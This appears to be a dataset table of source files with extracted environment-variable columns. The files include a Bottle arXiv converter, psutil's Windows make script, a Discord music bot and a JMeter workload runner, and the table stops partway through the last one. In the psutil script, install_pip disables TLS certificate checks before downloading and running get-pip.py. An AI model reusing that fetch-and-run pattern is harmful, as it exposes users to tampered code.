filename (string) | content (string) | environment (list) | variablearg (list) | constarg (list) | variableargjson (string) | constargjson (string) | lang (string) | constargcount (float64) | variableargcount (float64) | sentence (string)
---|---|---|---|---|---|---|---|---|---|---|
app.py | import os
import bottle
import pymongo
import redis
from rq import Queue
from worker import arxiv_worker
host = '0.0.0.0'
port = os.environ.get('PORT', 8080)
redis_url = os.environ.get('REDIS_URL', 'redis://queue:6379')
mongodb_url = os.environ.get('MONGODB_URL', 'mongodb://db:27017/db')
is_production = os.environ.get('DEBUG', False)
print('is_production:', is_production)
# setup database
mongo_client = pymongo.MongoClient(mongodb_url)
db = mongo_client.get_default_database()
papers = db.papers
# setup job queue
print('redis_url:', redis_url)
redis_conn = redis.from_url(redis_url)
queue = Queue(connection=redis_conn)
@bottle.route('/static/<filepath:path>')
def server_static(filepath):
return bottle.static_file(
filepath,
root=os.path.join(
os.path.dirname(os.path.realpath(__file__)), './static'))
@bottle.get('/')
def welcome():
return bottle.template("""
% rebase('template/base.tpl', title='Readable Paper')
<style>
body {
text-align: center;
}
</style>
<form onSubmit="location.pathname='/arxiv/'+document.querySelector('#field').value; return false">
<input type="text" id="field" placeholder="arXiv ID" />
<button type="submit">Convert</button>
<p>Supports <a href="https://arxiv.org">arXiv</a> papers.</p>
<p>Put an arXiv ID into the field above to convert (e.g. <b>1612.04811v1</b>)</p>
</form>
""")
@bottle.get('/arxiv/<id>')
def arxiv_get(id):
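# Look for an in-flight conversion job in Redis, then a cached result in MongoDB; otherwise enqueue a new worker job.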
if redis_conn.exists(id):
job = queue.fetch_job(redis_conn.get(id).decode('utf-8'))
if job is None:
redis_conn.delete(id)
elif job.result is None:
return bottle.template("""
% rebase('template/base.tpl', title='Readable Paper')
<p>Converting now! Wait for a sec and refresh this page</p>
""")
paper = papers.find_one({"arxiv_id": id})
if paper:
return bottle.template(
"""
% rebase('template/base.tpl', title='Readable Paper')
<div class="paper">
<blockquote>
<a href="https://arxiv.org/abs/{{arxiv_id}}">Original source</a>
</blockquote>
{{!content}}
</div>
""",
content=paper['content'],
arxiv_id=id)
else:
# enqueue job and push job id to DB
job = queue.enqueue(arxiv_worker.fetch_and_convert_tex, id)
redis_conn.set(id, job.id.encode('utf-8'))
return bottle.template("""
% rebase('template/base.tpl', title='Readable Paper')
<p>Process has been started! Refresh this page later</p>
""")
bottle.run(host=host, port=port, server='paste', debug=(not is_production))
| [] | [] | ["PORT", "MONGODB_URL", "REDIS_URL", "DEBUG"] | [] | ["PORT", "MONGODB_URL", "REDIS_URL", "DEBUG"] | python | 4 | 0 | |
pygoat/wsgi.py | """
WSGI config for pygoat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pygoat.settings")
application = get_wsgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
train.py | import os
from torch.backends import cudnn
from utils.logger import setup_logger
from datasets import make_dataloader
from model import make_model
from solver import make_optimizer, WarmupMultiStepLR
from loss import make_loss
from processor import do_train
import random
import torch
import numpy as np
import argparse
from config import cfg
if __name__ == '__main__':
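# Fix the random seeds for torch, numpy and Python's random module so runs are reproducible.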
torch.manual_seed(1234)
torch.cuda.manual_seed(1234)
torch.cuda.manual_seed_all(1234)
np.random.seed(1234)
random.seed(1234)
torch.backends.cudnn.deterministic = True
cudnn.benchmark = True
parser = argparse.ArgumentParser(description="ReID Baseline Training")
parser.add_argument(
"--config_file", default="", help="path to config file", type=str
)
parser.add_argument("opts", help="Modify config options using the command-line", default=None,
nargs=argparse.REMAINDER)
args = parser.parse_args()
if args.config_file != "":
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
output_dir = cfg.OUTPUT_DIR
if output_dir and not os.path.exists(output_dir):
os.makedirs(output_dir)
logger = setup_logger("reid_baseline", output_dir, if_train=True)
logger.info("Saving model in the path :{}".format(cfg.OUTPUT_DIR))
logger.info(args)
if args.config_file != "":
logger.info("Loaded configuration file {}".format(args.config_file))
with open(args.config_file, 'r') as cf:
config_str = "\n" + cf.read()
logger.info(config_str)
logger.info("Running with config:\n{}".format(cfg))
os.environ['CUDA_VISIBLE_DEVICES'] = cfg.MODEL.DEVICE_ID
train_loader, val_loader, num_query, num_classes = make_dataloader(cfg)
if cfg.MODEL.PRETRAIN_CHOICE == 'finetune':
model = make_model(cfg, num_class=num_classes)
model.load_param_finetune(cfg.MODEL.PRETRAIN_PATH)
print('Loading pretrained model for finetuning......')
else:
model = make_model(cfg, num_class=num_classes)
loss_func, center_criterion = make_loss(cfg, num_classes=num_classes)
optimizer, optimizer_center = make_optimizer(cfg, model, center_criterion)
scheduler = WarmupMultiStepLR(optimizer, cfg.SOLVER.STEPS, cfg.SOLVER.GAMMA,
cfg.SOLVER.WARMUP_FACTOR,
cfg.SOLVER.WARMUP_EPOCHS, cfg.SOLVER.WARMUP_METHOD)
do_train(
cfg,
model,
center_criterion,
train_loader,
val_loader,
optimizer,
optimizer_center,
scheduler, # modify for using self trained model
loss_func,
num_query
)
| [] | [] | ["CUDA_VISIBLE_DEVICES"] | [] | ["CUDA_VISIBLE_DEVICES"] | python | 1 | 0 | |
scripts/internal/winmake.py | #!/usr/bin/env python
# Copyright (c) 2009 Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shortcuts for various tasks, emulating UNIX "make" on Windows.
This is supposed to be invoked by "make.bat" and not used directly.
This was originally written as a bat file but they suck so much
that they should be deemed illegal!
"""
from __future__ import print_function
import errno
import fnmatch
import functools
import os
import shutil
import site
import ssl
import subprocess
import sys
import tempfile
APPVEYOR = bool(os.environ.get('APPVEYOR'))
if APPVEYOR:
PYTHON = sys.executable
else:
PYTHON = os.getenv('PYTHON', sys.executable)
TSCRIPT = os.getenv('TSCRIPT', 'psutil\\tests\\__main__.py')
GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
PY3 = sys.version_info[0] == 3
HERE = os.path.abspath(os.path.dirname(__file__))
ROOT_DIR = os.path.realpath(os.path.join(HERE, "..", ".."))
DEPS = [
"coverage",
"flake8",
"nose",
"pdbpp",
"perf",
"pip",
"pypiwin32==219" if sys.version_info[:2] <= (3, 4) else "pypiwin32",
"pyreadline",
"setuptools",
"wheel",
"wmi",
"requests"
]
if sys.version_info[:2] <= (2, 6):
DEPS.append('unittest2')
if sys.version_info[:2] <= (2, 7):
DEPS.append('mock')
if sys.version_info[:2] <= (3, 2):
DEPS.append('ipaddress')
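# Registry of make-style targets: the @cmd decorator below stores each command's docstring here so help() can list it.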
_cmds = {}
if PY3:
basestring = str
# ===================================================================
# utils
# ===================================================================
def safe_print(text, file=sys.stdout, flush=False):
"""Prints a (unicode) string to the console, encoded depending on
the stdout/file encoding (eg. cp437 on Windows). This is to avoid
encoding errors in case of funky path names.
Works with Python 2 and 3.
"""
if not isinstance(text, basestring):
return print(text, file=file)
try:
file.write(text)
except UnicodeEncodeError:
bytes_string = text.encode(file.encoding, 'backslashreplace')
if hasattr(file, 'buffer'):
file.buffer.write(bytes_string)
else:
text = bytes_string.decode(file.encoding, 'strict')
file.write(text)
file.write("\n")
def sh(cmd, nolog=False):
if not nolog:
safe_print("cmd: " + cmd)
p = subprocess.Popen(cmd, shell=True, env=os.environ, cwd=os.getcwd())
p.communicate()
if p.returncode != 0:
sys.exit(p.returncode)
def cmd(fun):
@functools.wraps(fun)
def wrapper(*args, **kwds):
return fun(*args, **kwds)
_cmds[fun.__name__] = fun.__doc__
return wrapper
def rm(pattern, directory=False):
"""Recursively remove a file or dir by pattern."""
def safe_remove(path):
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
else:
safe_print("rm %s" % path)
def safe_rmtree(path):
def onerror(fun, path, excinfo):
exc = excinfo[1]
if exc.errno != errno.ENOENT:
raise
existed = os.path.isdir(path)
shutil.rmtree(path, onerror=onerror)
if existed:
safe_print("rmdir -f %s" % path)
if "*" not in pattern:
if directory:
safe_rmtree(pattern)
else:
safe_remove(pattern)
return
for root, subdirs, subfiles in os.walk('.'):
root = os.path.normpath(root)
if root.startswith('.git/'):
continue
found = fnmatch.filter(subdirs if directory else subfiles, pattern)
for name in found:
path = os.path.join(root, name)
if directory:
safe_print("rmdir -f %s" % path)
safe_rmtree(path)
else:
safe_print("rm %s" % path)
safe_remove(path)
def safe_remove(path):
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
else:
safe_print("rm %s" % path)
def safe_rmtree(path):
def onerror(fun, path, excinfo):
exc = excinfo[1]
if exc.errno != errno.ENOENT:
raise
existed = os.path.isdir(path)
shutil.rmtree(path, onerror=onerror)
if existed:
safe_print("rmdir -f %s" % path)
def recursive_rm(*patterns):
"""Recursively remove a file or matching a list of patterns."""
for root, subdirs, subfiles in os.walk(u'.'):
root = os.path.normpath(root)
if root.startswith('.git/'):
continue
for file in subfiles:
for pattern in patterns:
if fnmatch.fnmatch(file, pattern):
safe_remove(os.path.join(root, file))
for dir in subdirs:
for pattern in patterns:
if fnmatch.fnmatch(dir, pattern):
safe_rmtree(os.path.join(root, dir))
def test_setup():
os.environ['PYTHONWARNINGS'] = 'all'
os.environ['PSUTIL_TESTING'] = '1'
os.environ['PSUTIL_DEBUG'] = '1'
# ===================================================================
# commands
# ===================================================================
@cmd
def help():
"""Print this help"""
safe_print('Run "make [-p <PYTHON>] <target>" where <target> is one of:')
for name in sorted(_cmds):
safe_print(
" %-20s %s" % (name.replace('_', '-'), _cmds[name] or ''))
sys.exit(1)
@cmd
def build():
"""Build / compile"""
# Make sure setuptools is installed (needed for 'develop' /
# edit mode).
sh('%s -c "import setuptools"' % PYTHON)
sh("%s setup.py build" % PYTHON)
# Copies compiled *.pyd files in ./psutil directory in order to
# allow "import psutil" when using the interactive interpreter
# from within this directory.
sh("%s setup.py build_ext -i" % PYTHON)
# Make sure it actually worked.
sh('%s -c "import psutil"' % PYTHON)
@cmd
def wheel():
"""Create wheel file."""
build()
sh("%s setup.py bdist_wheel" % PYTHON)
@cmd
def upload_wheels():
"""Upload wheel files on PYPI."""
build()
sh("%s -m twine upload dist/*.whl" % PYTHON)
@cmd
def install_pip():
"""Install pip"""
try:
import pip # NOQA
except ImportError:
if PY3:
from urllib.request import urlopen
else:
from urllib2 import urlopen
if hasattr(ssl, '_create_unverified_context'):
ctx = ssl._create_unverified_context()
else:
ctx = None
kw = dict(context=ctx) if ctx else {}
safe_print("downloading %s" % GET_PIP_URL)
req = urlopen(GET_PIP_URL, **kw)
data = req.read()
tfile = os.path.join(tempfile.gettempdir(), 'get-pip.py')
with open(tfile, 'wb') as f:
f.write(data)
try:
sh('%s %s --user' % (PYTHON, tfile))
finally:
os.remove(tfile)
@cmd
def install():
"""Install in develop / edit mode"""
install_git_hooks()
build()
sh("%s setup.py develop" % PYTHON)
@cmd
def uninstall():
"""Uninstall psutil"""
# Uninstalling psutil on Windows seems to be tricky.
# On "import psutil" tests may import a psutil version living in
# C:\PythonXY\Lib\site-packages which is not what we want, so
# we try both "pip uninstall psutil" and manually remove stuff
# from site-packages.
clean()
install_pip()
here = os.getcwd()
try:
os.chdir('C:\\')
while True:
try:
import psutil # NOQA
except ImportError:
break
else:
sh("%s -m pip uninstall -y psutil" % PYTHON)
finally:
os.chdir(here)
for dir in site.getsitepackages():
for name in os.listdir(dir):
if name.startswith('psutil'):
rm(os.path.join(dir, name))
@cmd
def clean():
"""Deletes dev files"""
recursive_rm(
"$testfn*",
"*.bak",
"*.core",
"*.egg-info",
"*.orig",
"*.pyc",
"*.pyd",
"*.pyo",
"*.rej",
"*.so",
"*.~",
"*__pycache__",
".coverage",
".tox",
)
safe_rmtree("build")
safe_rmtree(".coverage")
safe_rmtree("dist")
safe_rmtree("docs/_build")
safe_rmtree("htmlcov")
safe_rmtree("tmp")
@cmd
def setup_dev_env():
"""Install useful deps"""
install_pip()
install_git_hooks()
sh("%s -m pip install -U %s" % (PYTHON, " ".join(DEPS)))
@cmd
def flake8():
"""Run flake8 against all py files"""
py_files = subprocess.check_output("git ls-files")
if PY3:
py_files = py_files.decode()
py_files = [x for x in py_files.split() if x.endswith('.py')]
py_files = ' '.join(py_files)
sh("%s -m flake8 %s" % (PYTHON, py_files), nolog=True)
@cmd
def test():
"""Run tests"""
install()
test_setup()
sh("%s %s" % (PYTHON, TSCRIPT))
@cmd
def coverage():
"""Run coverage tests."""
# Note: coverage options are controlled by .coveragerc file
install()
test_setup()
sh("%s -m coverage run %s" % (PYTHON, TSCRIPT))
sh("%s -m coverage report" % PYTHON)
sh("%s -m coverage html" % PYTHON)
sh("%s -m webbrowser -t htmlcov/index.html" % PYTHON)
@cmd
def test_process():
"""Run process tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_process.py" % PYTHON)
@cmd
def test_system():
"""Run system tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_system.py" % PYTHON)
@cmd
def test_platform():
"""Run windows only tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_windows.py" % PYTHON)
@cmd
def test_misc():
"""Run misc tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_misc.py" % PYTHON)
@cmd
def test_unicode():
"""Run unicode tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_unicode.py" % PYTHON)
@cmd
def test_connections():
"""Run connections tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_connections.py" % PYTHON)
@cmd
def test_contracts():
"""Run contracts tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_contracts.py" % PYTHON)
@cmd
def test_by_name():
"""Run test by name"""
try:
safe_print(sys.argv)
name = sys.argv[2]
except IndexError:
sys.exit('second arg missing')
install()
test_setup()
sh("%s -m unittest -v %s" % (PYTHON, name))
@cmd
def test_script():
"""Quick way to test a script"""
try:
safe_print(sys.argv)
name = sys.argv[2]
except IndexError:
sys.exit('second arg missing')
install()
test_setup()
sh("%s %s" % (PYTHON, name))
@cmd
def test_memleaks():
"""Run memory leaks tests"""
install()
test_setup()
sh("%s psutil\\tests\\test_memory_leaks.py" % PYTHON)
@cmd
def install_git_hooks():
"""Install GIT pre-commit hook."""
if os.path.isdir('.git'):
src = os.path.join(ROOT_DIR, ".git-pre-commit")
dst = os.path.realpath(
os.path.join(ROOT_DIR, ".git", "hooks", "pre-commit"))
with open(src, "rt") as s:
with open(dst, "wt") as d:
d.write(s.read())
@cmd
def bench_oneshot():
"""Benchmarks for oneshot() ctx manager (see #799)."""
install()
sh("%s -Wa scripts\\internal\\bench_oneshot.py" % PYTHON)
@cmd
def bench_oneshot_2():
"""Same as above but using perf module (supposed to be more precise)."""
install()
sh("%s -Wa scripts\\internal\\bench_oneshot_2.py" % PYTHON)
def set_python(s):
global PYTHON
if os.path.isabs(s):
PYTHON = s
else:
# try to look for a python installation
orig = s
s = s.replace('.', '')
vers = ('26', '27', '34', '35', '36', '37',
'26-64', '27-64', '34-64', '35-64', '36-64', '37-64')
for v in vers:
if s == v:
path = 'C:\\python%s\\python.exe' % s
if os.path.isfile(path):
print(path)
PYTHON = path
os.putenv('PYTHON', path)
return
return sys.exit(
"can't find any python installation matching %r" % orig)
def parse_cmdline():
if '-p' in sys.argv:
try:
pos = sys.argv.index('-p')
sys.argv.pop(pos)
py = sys.argv.pop(pos)
except IndexError:
return help()
set_python(py)
def main():
parse_cmdline()
try:
cmd = sys.argv[1].replace('-', '_')
except IndexError:
return help()
if cmd in _cmds:
fun = getattr(sys.modules[__name__], cmd)
fun()
else:
help()
if __name__ == '__main__':
main()
| [] | [] | ["APPVEYOR", "TSCRIPT", "PYTHON", "PYTHONWARNINGS", "PSUTIL_DEBUG", "PSUTIL_TESTING"] | [] | ["APPVEYOR", "TSCRIPT", "PYTHON", "PYTHONWARNINGS", "PSUTIL_DEBUG", "PSUTIL_TESTING"] | python | 6 | 0 | |
music.py | import asyncio
import os
import discord
from discord.ext import commands
from discord.ext.commands.core import command
from pytube import *
from random import shuffle
class Music(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.is_playing = False
self.shuffled = False
self.now_playing = ""
self.music_queue = []
self.vc = ""
self.FFMPEG_OPTIONS = {"before_options": "-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5", "options": "-vn"}
@commands.Cog.listener()
async def on_voice_state_update(self, member, before, after):
if not member.id == self.bot.user.id:
return
elif before.channel is None:
time = 0
while True:
await asyncio.sleep(1)
if len(self.vc.channel.voice_states.keys()) == 1:
await self.vc.disconnect()
if not self.vc.is_connected():
break
def play_next(self):
if len(self.music_queue) > 0:
self.is_playing = True
source = self.music_queue[0][0]
self.now_playing = self.music_queue[0][1]
self.music_queue.pop(0)
self.vc.play(discord.FFmpegPCMAudio(source, **self.FFMPEG_OPTIONS), after = lambda e: self.play_next())
else:
self.is_playing = False
async def play_music(self, ctx):
if len(self.music_queue) > 0:
self.is_playing = True
source = self.music_queue[0][0]
if self.vc == "" or not self.vc.is_connected() or self.vc is None:
self.vc = await self.music_queue[0][2].connect()
else:
await self.vc.move_to(self.music_queue[0][2])
self.now_playing = self.music_queue[0][1]
await ctx.send(f"Now Playing: {self.music_queue[0][1]}")
self.vc.play(discord.FFmpegPCMAudio(source, **self.FFMPEG_OPTIONS), after = lambda e: self.play_next())
self.music_queue.pop(0)
else:
self.is_playing = False
@commands.command(name = "play", help = "Searches or plays link")
async def play(self, ctx, *args):
query = " ".join(args)
voice_channel = ctx.author.voice.channel
if voice_channel is None:
await ctx.send("Connect to a Voice Channel")
else:
if "youtube.com/playlist" in query:
playlist = Playlist(query)
furl = playlist.video_urls[0]
fytObject = YouTube(furl)
fytSource = fytObject.streams.get_audio_only().url
fytTitle = fytObject.title
self.music_queue.append([fytSource, fytTitle, voice_channel])
message = await ctx.send(f"{fytTitle} Added to the Queue, Added 1/{len(playlist.video_urls)}")
if not self.is_playing:
await self.play_music(ctx)
for i in range(1, len(playlist.video_urls)):
url = playlist.video_urls[i]
ytObject = YouTube(url)
ytSource = ytObject.streams.get_audio_only().url
ytTitle = ytObject.title
self.music_queue.append([ytSource, ytTitle, voice_channel])
await message.edit(content = f"{fytTitle} Added to the Queue, Added {i+1}/{len(playlist.video_urls)}")
elif ("youtube.com/watch" in query) or ("youtu.be/" in query) or ("youtube.com/shorts" in query):
loopCount = 1
if "-loop" in query:
ytObject = YouTube(str(query).split('-loop')[0])
try:
loopCount = int(str(query).split('-loop')[1])
except:
await ctx.send(f"Invalid iterator")
else:
ytObject = YouTube(str(query))
ytSource = ytObject.streams.get_audio_only().url
ytTitle = ytObject.title
for i in range(0, loopCount):
self.music_queue.append([ytSource, ytTitle, voice_channel])
if loopCount == 1:
await ctx.send(f"{ytTitle} Added to the Queue")
else:
await ctx.send(f"{ytTitle} Added to the Queue {loopCount} times!")
if not self.is_playing:
await self.play_music(ctx)
else:
searchObject = Search(query)
searchResults = ""
for i in range(0, 10):
searchResults += f"{i+1} - {searchObject.results[i].title}\n"
message = await ctx.send(searchResults)
def check(reply):
return reply.content.startswith("!") and reply.author == ctx.author and reply.channel == ctx.channel
rChoice = await self.bot.wait_for("message", check = check, timeout = 15)
choice = int(rChoice.content[1:])
ytSource = searchObject.results[choice-1].streams.get_audio_only().url
ytTitle = searchObject.results[choice-1].title
self.music_queue.append([ytSource, ytTitle, voice_channel])
await message.edit(content = f"{ytTitle} Added to the Queue")
if not self.is_playing:
await self.play_music(ctx)
if self.shuffled:
shuffle(self.music_queue)
@commands.command(name = "stream", help = "Streams audio from live stream URL")
async def stream(self, ctx, url):
voice_channel = ctx.author.voice.channel
if voice_channel is None:
await ctx.send("Connect to a Voice Channel")
else:
await ctx.send(f"{url} Added to the Queue")
self.music_queue.append([url, url, voice_channel])
if not self.is_playing:
await self.play_music(ctx)
if self.shuffled:
shuffle(self.music_queue)
@commands.command(name = "clean", help = "Streams audio from live stream URL")
async def clean(self, ctx):
self.music_queue.clear()
await ctx.send("Cleaned queue")
@commands.command(name = "shuffle", help = "Shuffles queue until disabled")
async def shuffle(self, ctx):
if not self.shuffled:
shuffle(self.music_queue)
self.shuffled = True
await ctx.send("Shuffle Enabled")
else:
self.shuffled = False
await ctx.send("Shuffle Disabled")
@commands.command(name = "now", help = "Shows current song")
async def now(self, ctx):
if not self.is_playing:
await ctx.send(f"Not Playing")
else:
await ctx.send(f"Now Playing: {self.now_playing}")
@commands.command(name = "queue", help = "Shows queue")
async def queue(self, ctx):
retVal = ""
for i in range(0, len(self.music_queue)):
retVal += f"{i+1} - {self.music_queue[i][1]}\n"
if retVal != "":
await ctx.send(f"Now Playing: {self.now_playing}\n{retVal}")
else:
if self.is_playing:
await ctx.send(f"Now Playing: {self.now_playing}\nQueue Empty")
elif not self.is_playing:
await ctx.send("Not Playing and Queue Empty")
@commands.command(name = "skip", help = "Skips current song")
async def skip(self, ctx):
await ctx.send("Current Song Skipped")
self.vc.stop()
await self.play_music(ctx)
@commands.command(name = "skipto", help = "Skips to selected index in queue")
async def skipto(self, ctx, *args):
num = "".join(*args)
if self.vc != "" and self.vc:
if int(num) == 1:
await ctx.send("Current Song Skipped")
self.vc.stop()
await self.play_music(ctx)
elif int(num) >= 1:
await ctx.send(f"Skipped {num} Songs")
self.vc.stop()
del self.music_queue[0:(int(num)-1)]
await self.play_music(ctx)
else:
await ctx.send("Current Song Skipped")
self.vc.stop()
await self.play_music(ctx)
@commands.command(name = "remove", help = "Removes song from queue at selected index")
async def remove(self, ctx, *args):
i = "".join(*args)
await ctx.send(f"{self.music_queue[i][1]} Removed from the Queue")
self.music_queue.pop(i)
@commands.command(name = "pause", help = "Pauses music")
async def pause(self, ctx):
self.vc.pause()
await ctx.send("Paused Music")
@commands.command(name = "resume", help = "Resumes music")
async def resume(self, ctx):
self.vc.resume()
await ctx.send("Resumed Music")
@commands.command(name = "stop", help = "Stops music and clears queue")
async def stop(self, ctx):
self.vc.stop()
self.music_queue = []
self.shuffled = False
await ctx.send("Music Stopped and Queue Cleared")
@commands.command(name = "leave", help = "Stops music, clears queue and leaves")
async def leave(self, ctx):
if self.vc.is_connected():
self.vc.stop()
self.music_queue = []
await ctx.send("Leaving Voice Channel")
await self.vc.disconnect(force=True)
bot = commands.Bot(command_prefix = "!", case_insensitive=True)
bot.add_cog(Music(bot))
@bot.command(name = "ping", help = "Shows bot latency")
async def ping(ctx):
await ctx.send(f"Latency: {round(bot.latency * 1000)}ms")
@bot.event
async def on_ready():
print("Bot Online")
await bot.change_presence(activity = discord.Activity(type = discord.ActivityType.listening, name = "Music | !help"))
bot.run(os.getenv("TOKEN"))
| [] | [] | ["TOKEN"] | [] | ["TOKEN"] | python | 1 | 0 | |
kstreams-live-update/event-source/src/main/java/io/debezium/examples/kstreams/liveupdate/eventsource/Main.java | /*
* Copyright Debezium Authors.
*
* Licensed under the Apache Software License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0
*/
package io.debezium.examples.kstreams.liveupdate.eventsource;
public class Main {
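// run() reads the DATABASE_SERVER environment variable (defaulting to "mysql" for backwards compatibility), registers a shutdown hook to stop the source, and runs it.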
private void run() {
String databaseServer = System.getenv("DATABASE_SERVER");
if (databaseServer == null) {
/* backwards compatibility */
databaseServer = "mysql";
}
EventSource source = new EventSource(databaseServer);
Runtime.getRuntime().addShutdownHook(new Thread(() -> {
System.out.println("Stopping...");
source.stop();
}));
source.run();
}
public static void main(String[] args) {
new Main().run();
}
}
| ["\"DATABASE_SERVER\""] | [] | ["DATABASE_SERVER"] | [] | ["DATABASE_SERVER"] | java | 1 | 0 | |
backend/old_heart_29880/wsgi.py | """
WSGI config for old_heart_29880 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'old_heart_29880.settings')
application = get_wsgi_application()
| [] | [] | [] | [] | [] | python | 0 | 0 | |
proxy/init.go | package proxy
import (
"os"
"reflect"
"github.com/globalsign/mgo"
"github.com/goulang/goulang/models"
)
var User *userProxy
var Qiniu *qiniuProxy
var Topic *topicProxy
var Comment *commentProxy
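// init dials MongoDB at the address given by the MONGO environment variable (panicking on failure) and wires up the collection proxies.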
func init() {
session, err := mgo.Dial(os.Getenv("MONGO"))
if err != nil {
panic(err)
}
User = &userProxy{baseProxy{session.DB("goulang").C("user"), reflect.TypeOf((*models.User)(nil)).Elem()}}
Qiniu = &qiniuProxy{baseProxy{session.DB("goulang").C("qiniu"), reflect.TypeOf((*models.QFile)(nil)).Elem()}}
Topic = &topicProxy{baseProxy{session.DB("goulang").C("topic"), reflect.TypeOf((*models.Topic)(nil)).Elem()}}
Comment = &commentProxy{baseProxy{session.DB("goulang").C("comment"), reflect.TypeOf((*models.Comment)(nil)).Elem()}}
}
| ["\"MONGO\""] | [] | ["MONGO"] | [] | ["MONGO"] | go | 1 | 0 | |
wikipedia_workload/de/uni-stuttgart/iaas/workload/workloadExecutor.py | import os
from workload import constants as cs
import jprops as jprops
from csvHelper import csvHelper as csvHelper
import pandas as pd
import subprocess
# Run Workload Executor in background: python workloadExecutor.py >> /home/ubuntu/SCARF-Evaluation/wikipedia_workload/result_experiments_summary/T5_r1.log 2>&1 &
def getDateFromFileName(fileName):
split1 = fileName.split('-')
print split1
# Generate the File List & Read Files
pageCountFileList = csvHelper.retrieve_files_time_interval(cs.WIKISTATS_BEGIN_YEAR, cs.WIKISTATS_BEGIN_MONTH,
cs.WIKISTATS_BEGIN_DAY, cs.WIKISTATS_END_YEAR, cs.WIKISTATS_END_MONTH,
cs.WIKISTATS_END_DAY, cs.WIKISTATS_HOURS, cs.WIKISTATS_PAGECOUNTS)
generatedWorkloadFileList = [(cs.WIKISTATS_GENERATED_WORKLOAD_PREFIX + i + cs.WIKISTATS_FILE_SCALED_SUFFIX + '.csv')
for i in pageCountFileList]
output_workload_config_file = cs.DATA_LOCAL_PATH + 'workload_hourly_distribution_scaled_factor100.csv'
df_workload_config = pd.read_csv(output_workload_config_file, delimiter=' ')
# For each generated workload file:
# 1) Read the Workload Config Parameters for Each Hour and generate a custom config parameters file
# 2) Execute the jmeter load executer from Sherif
# 3) Save the result
count_workload_file_list = 0
for index,row in df_workload_config.iterrows():
config_properties = {cs.CONFIG_TEST_PLAN_PATH_VAR: cs.CONFIG_TEST_PLAN_PATH_VALUE,
cs.CONFIG_JMETER_PATH_VAR: cs.CONFIG_JMETER_PATH_VALUE}
scenario_id_value = pageCountFileList[count_workload_file_list].split('-')[1] + '-' + \
pageCountFileList[count_workload_file_list].split('-')[2]
##### Approach using the Dynamic Load Tester - Sherif
argument_properties = {cs.ARGUMENTS_JMETER_SCENARIO_ID_VAR: scenario_id_value,
cs.ARGUMENTS_JMETER_ROUND_ID_VAR: cs.ARGUMENTS_JMETER_ROUND_ID_VALUE,
cs.ARGUMENTS_JMETER_HTTP_HOST_VAR: cs.ARGUMENTS_JMETER_HTTP_HOST_VALUE,
cs.ARGUMENTS_JMETER_HTTP_PORT_VAR: cs.ARGUMENTS_JMETER_HTTP_PORT_VALUE,
cs.ARGUMENTS_JMETER_HTTP_PATH_VAR: cs.ARGUMENTS_JMETER_HTTP_PATH_VALUE,
cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VAR : cs.ARGUMENTS_JMETER_DELAY_BETWEEN_REQUESTS_VALUE,
cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VAR: cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_NAMES_VALUE,
cs.ARGUMENTS_JMETER_RESULTS_PATH_VAR: cs.ARGUMENTS_JMETER_RESULTS_PATH_VALUE,
cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VAR: cs.ARGUMENTS_JMETER_WORKLOAD_CSV_COL_DELIMITER_VALUE
}
print "Processing File: " + generatedWorkloadFileList[count_workload_file_list]
concurrent_users = str(int(row[cs.GENERATED_WORKLOAD_COL_HOURLY_CONCURRENT_USERS]) / 10)
thread_loop = cs.ARGUMENTS_JMETER_LOOP_PER_THREAD_VALUE
thread_rampup = cs.ARGUMENTS_JMETER_THREAD_RAMPUP_VALUE
workload_file_path = cs.ARGUMENTS_JMETER_WORKLOAD_CSV_PATH_VALUE + generatedWorkloadFileList[count_workload_file_list]
workload_file_num_csv_rows = str(len(pd.read_csv(cs.DATA_LOCAL_PATH + generatedWorkloadFileList[count_workload_file_list], delimiter=' ')))
hourly_sum_requests = str(int(row[cs.GENERATED_WORKLOAD_COL_SUM_REQS]))
argument_properties[cs.ARGUMENTS_JMETER_NUMBER_THREADS_VAR] = concurrent_users
argument_properties[cs.ARGUMENTS_JMETER_LOOP_PER_THREAD_VAR] = thread_loop
argument_properties[cs.ARGUMENTS_JMETER_THREAD_RAMPUP_VAR] = thread_rampup
argument_properties[cs.ARGUMENTS_JMETER_WORKLOAD_CSV_PATH_VAR] = workload_file_path
argument_properties[cs.ARGUMENTS_JMETER_WORKLOAD_CSV_NUM_ROWS_VAR] = workload_file_num_csv_rows
with open(cs.LOAD_TEST_CONFIG_FILE, 'w+') as fp:
jprops.store_properties(fp, config_properties)
with open(cs.LOAD_TEST_ARGUMENTS_FILE, 'w+') as fp:
jprops.store_properties(fp, argument_properties)
config_properties_file_path = cs.LOAD_TEST_CONFIG_FILE
arguments_properties_file_path = cs.LOAD_TEST_ARGUMENTS_FILE
#subprocess.call(['java', '-jar', cs.JAR_LOAD_TEST_PATH, config_properties_file_path, arguments_properties_file_path])
##### Alternative Approach using directly the JMeter JAR
jmeter_test_plan = cs.CONFIG_TEST_PLAN_PATH_VALUE
# Creating directory for the scenario results
